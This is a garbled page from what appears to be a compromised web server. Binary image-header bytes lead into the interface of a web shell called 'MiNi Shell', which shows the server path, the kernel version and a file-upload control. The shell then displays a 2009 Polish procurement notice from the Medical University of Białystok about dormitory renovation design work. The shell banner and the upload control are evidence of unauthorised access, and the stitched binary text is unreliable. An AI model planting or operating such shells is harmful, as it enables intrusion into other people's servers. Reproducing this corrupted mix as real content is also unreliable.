JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/43501-N-2009.html

<p class="kh_header"><b>Białystok: Opracowanie kompletnej wielobranżowej dokumentacji projektowej zadania p.n.: 
I.   Remont powierzchni wewnętrznych wraz z instalacjami Domu Studenta Nr 2 Uniwersytetu   Medycznego w Białymstoku przy ul. Waszyngtona 23 - budynek Nr 3 łącznie z portiernią,
II.  Remont parkingu naziemnego przy budynkach Domu Studenta Nr 2 wraz z niezbedną infrastrukturą techniczną i sprawowaniem nadzoru autorskiego w trakcie realizacji robót</b><br>
<b>Numer ogłoszenia: 43501 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej wielobranżowej dokumentacji projektowej zadania p.n.: 
I.   Remont powierzchni wewnętrznych wraz z instalacjami Domu Studenta Nr 2 Uniwersytetu   Medycznego w Białymstoku przy ul. Waszyngtona 23 - budynek Nr 3 łącznie z portiernią,
II.  Remont parkingu naziemnego przy budynkach Domu Studenta Nr 2 wraz z niezbedną infrastrukturą techniczną i sprawowaniem nadzoru autorskiego w trakcie realizacji robót.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie kompletnej wielobranżowej dokumentacji projektowej zadania p.n.: 
I.   Remont powierzchni wewnętrznych wraz z instalacjami Domu Studenta Nr 2 Uniwersytetu   Medycznego w Białymstoku przy ul. Waszyngtona 23 - budynek Nr 3 łącznie z portiernią,
II.  Remont parkingu naziemnego przy budynkach Domu Studenta Nr 2 wraz z niezbedną infrastrukturą techniczną i sprawowaniem nadzoru autorskiego w trakcie realizacji robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1)	Każda oferta musi być zabezpieczona wadium w wysokości 3.300,00 zł; (słownie: trzy tysiące trzysta 00/100 złotych).
2)	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  ( Dz. U. Nr 109, poz.1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz.1824).  
3)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Pekao S.A. Oddział w Białymstoku, numer r-ku: 40 124052 111111 000049 207392
4) Wadium wnoszone w formach wymienionych w pkt. 2 lit. b, c, d, e  należy złożyć w formie oryginału w Kancelarii Ogólnej UMB, ul. Kilińskiego 1, 15-089 Białystok (Pałac Branickich, lewe skrzydło-parter). Prosimy nie wkładać dokumentu do oferty.
5)  Wadium musi być wniesione najpóźniej w terminie składania ofert  do godz. 1000. 
      6)  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie znajdzie się na rachunku bankowym Zamawiającego.
7)  Zamawiający zwróci Wykonawcy niezwłocznie wadium, jeżeli:                
a)	upłynie termin związania ofertą;
b)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należyte-go wykonania tej umowy;
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia publicznego a protesty zostały  ostatecznie rozstrzygnięte lub upłynął termin ich wnoszenia. 
8)  Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
9)	Zamawiający żąda ponownego wniesienia wadium w określonym terminie przez Wykonawców, którym zwrócono wadium na podstawie ust. 8, lit. b) i c), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. 
10)	 Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.
11)	 Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy ra-chunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę na formularzu ofertowym. 
12)	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wy-brana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
      13) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym  mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niele-żących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)   O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki: 
                 a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
                     nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami   zdolnymi do wykonania zamówienia, t.j. dysponują zespołem projektowym zdolnym do wykonania przedmiotu zamówienia w składzie którego znajdują się osoby posiadające uprawnienia do projektowania bez ograniczeń w następujących branżach: 
            - architektonicznej, 
            - konstrukcyjno-budowlanej, 
            - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych            
              i kanalizacyjnych, 
            - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
a także zrealizowali:
- co najmniej jedną dokumentację projektową o wartości min. 80 000,00 PLN brutto (słownie: osiemdziesiąt tysięcy 00/100 PLN)  we wszystkich branżach objętych przedmiotem niniejszego zamówienia   w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia;
               c)  znajdują się w sytuacji finansowej pozwalającej na wykonanie zamówienia przy założeniu,
iż  zapłata za wykonanie przedmiotu zamówienia nastąpi na podstawie protokołu zdawczo-odbiorczego - przelew w terminie 30 dni od daty otrzymania faktury VAT;
               d)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp).
2)	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formu-ły:  spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych w SIWZ dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie,  że w/w warunki Wykonawca spełnił.
3)	Wykonawca zostanie wykluczony z postępowania, jeżeli chociaż jeden z w/w warunków nie 
      zostanie spełniony.
4)   Z postępowania o udzielenie zamówienia wykluczeniu podlegają również Wykonawcy, którzy:
a)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się z w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych Wykonawców w postępowaniu nie utrudni uczciwej konkurencji; 
b)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; 
c)	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 ustawy Pzp;
d)	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
5)	Ofertę Wykonawcy wykluczonego Zamawiający uzna za odrzuconą.
6)	O wykluczeniu z postępowania Zamawiający po wyborze oferty najkorzystniejszej niezwłocznie powiadomi Wykonawcę podając uzasadnienie faktyczne i prawne.
7)	Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty.
8)	Oferta musi być napisana w języku polskim, na maszynie do pisania, komputerze lub inną, czytelną i trwałą techniką, oraz podpisana przez osobę upoważnioną do reprezentowania firmy na ze-wnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty. Dokumenty wystawione w języku obcym należy złożyć wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Każda zapisana strona oferty musi być ponumerowana kolejnymi numerami, a cała oferta zestawiona w sposób trwale połączony.
        9)  Nie dopuszcza się jakichkolwiek poprawek, skreśleń w treści oferty wraz z załącznikami, bez jednoczesnego podpisania się przez osoby uprawnione do reprezentacji Wykonawcy przy naniesio-nych poprawkach, skreśleniach, itp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać wszystkie dokumenty (oryginały lub kopie poświadczone za zgodność z oryginałem) oraz oświadczenia wymagane odpowiednimi postanowieniami SIWZ. Oświadczenia i doku-menty podpisuje uprawniony lub upoważniony przedstawiciel Wykonawcy. Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez uprawnionego lub upoważnionego przedstawiciela Wykonawcy. Upoważnienie do podpisania oświadczeń i innych dokumentów powinno być dołączone do oferty. Ustanowione pełnomocnictwo musi być załączone do oferty w formie oryginału, odpisu lub kopii potwierdzonej notarialnie.    
1)	Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego  zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605, ze zm. oraz zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008r. ze zm.).
a)	oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp i nie podleganiu wykluczeniu zgodnie z art. 24 ust. 1 i ust. 2 pkt. 1-4 ustawy Pzp - wg załącznika Nr 2 w do SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy Wykonawca).
                1.1. Dokumenty potwierdzające posiadanie przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności:
a)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspól-nicy spółki cywilnej - odrębnie);
b)	koncesje, zezwolenia lub licencje, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym niniejszym zamówieniem (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - odrębnie);
c)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty (w przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - odrębnie i dodatkowo na spółkę cywilną);
d)	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania oferty (w przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wyko-nawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej - łącznie).
                1.2. Dokumenty potwierdzające posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia: 
a)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, usług  w  okresie ostatnich trzech  lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, t.j.: co najmniej jedną dokumentację projektową  o wartości min. 80 000,00 PLN brutto(słownie: osiemdziesiąt tysięcy 00/100 PLN) we wszystkich branżach objętych przedmiotem niniejszego zamówienia, wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie - wg załącznika Nr 3 do SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, z przedłożonego wykazu musi wynikać, że warunek ten jest spełniony przez nich łącznie); 
b)	wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wykaz winien zawierać w odniesieniu do każdej z wymienionych osób następujące dane: imię i nazwisko, posiadane uprawnienia (nr, rodzaj), planowana funkcja w realizacji zamówienia, dokumenty aktualne na dzień składania ofert stwierdzające, że osoby wskazane w wykazie posiadają wymagane uprawnienia projektowe w specjalnościach nie-zbędnych do realizacji zamówienia oraz są członkami właściwych izb samorządu zawodowego - wg załącznika Nr 4 do SIWZ (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. składających ofertę wspólnie, z przedłożonego wykazu musi wynikać, że warunek ten jest spełniony przez nich łącznie). 
2)	  Dokumenty pozostałe:
a)	wypełniony formularz ofertowy  - wg załącznika  Nr  1 do SIWZ; 
b)	wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom (jeżeli są przewidywani) - wg załącznika Nr 5 do SIWZ;
c)	oświadczenie uczestnika postępowania, o przysługi autorskich praw majątkowych w zakresie określonym w warunkach postępowania  - wg załącznik Nr 6 do SIWZ;
d)	oświadczenie uczestnika postępowania  o nieodpłatnym przekazaniu praw autorskich na rzecz Zamawiającego - wg załącznika Nr 7 do SIWZ; 
e)	w  przypadku Wykonawców występujących wspólnie (konsorcjum, s. c.), Wykonawcy  składają oświad-czenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy; 
f)	oświadczenia małżonka Wykonawcy - wg  załącznika Nr  9 do  SIWZ  - zgodnie z zapisem 
        w uwadze poniżej: 
Uwaga: W związku z przepisem art. 787 kodeksu postępowania cywilnego, Wykonawcy występujący w obrocie jako indywidualny podmiot gospodarczy, wspólnicy spółki cywilnej, wspólnicy spółki jawnej, pozostający w związku małżeńskim na zasadzie ustawowej wspól-ności majątkowej, zobowiązani są do złożenia oświadczeń współmałżonków, których treść stanowi załącznik Nr 9 do SIWZ.
3)	Informacje dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP: 
a)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej:
- w ust 1, pkt.1.1., lit. a), b), c) i d)  - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności dokumentów zawierających oświadczenie stosuje się odpo-wiednio jak w ust. 3. lit. a),
c)	dokumenty należy złożyć w języku polskim. Dokumenty wystawione w języku obcym należy złożyć wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Wyko-nawca ma prawo złożyć tylko jedną ofertę, samodzielnie lub wspólnie z innymi Wykonawcami. Wykonawca, który złoży więcej niż jedną ofertę zostanie wykluczony z postępowania,
d)	oferta powinna zawierać wszystkie dokumenty (oryginały lub kopie poświadczone za zgod-ność z oryginałem) oraz oświadczenia wymagane odpowiednimi postanowieniami SIWZ. Oświadczenia i dokumenty podpisuje uprawniony lub upoważniony przedstawiciel Wykonawcy. Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez uprawnio-nego lub upoważnionego przedstawiciela Wykonawcy. Upoważnienie do podpisania oświad-czeń i innych dokumentów powinno być dołączone do oferty. Ustanowione pełnomocnictwo musi być załączone do oferty w formie oryginału, odpisu lub kopii potwierdzonej notarialnie.  
4)	Wykonawcy występujący wspólnie (konsorcjum, s.c.) muszą ustanowić Wykonawcę - Pełnomocnika do reprezentowania ich w postępowaniu albo Wykonawcę - Pełnomocnika do re-prezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie zamówienia. 
a)	Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być załączo-ny do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umocowania. Dokument potwierdzający ustanowienie Wykonawcy - Pełnomocnika musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. Dokument pełnomocnictwa należy przedstawić w formie oryginału lub kserokopii potwierdzonej notarialnie. Wszelka korespondencja oraz rozliczenia dokony-wane będą wyłącznie z podmiotem występującym jako Pełnomocnik pozostałych, przy czym uregulowanie płatności następować będzie wprost na konto danego podmiotu (wyłącznie wskazanego w umowie) lub na utworzone w banku wspólne (np. konsorcjum) konto rozliczeniowe, na które wpłacane będą należności za świadczenia wykonane przez poszczególne podmioty. 
b)	Wykonawcy występujące wspólnie muszą złożyć oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy (dołączyć oświadczenie). 
c)	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Medyczny w Białymstoku, 15-222 Białystok, ul. A. Mickiewicza 2c, Sekcja d/s Zamówień Publicznych, pok. Nr 12A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: Uniwersytet Medyczny w Białymstoku, 15-089 Białystok, ul. Jana Kilińskiego 1, Kancelaria Ogólna UMB, (lewe skrzydło Pałacu Branickich - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com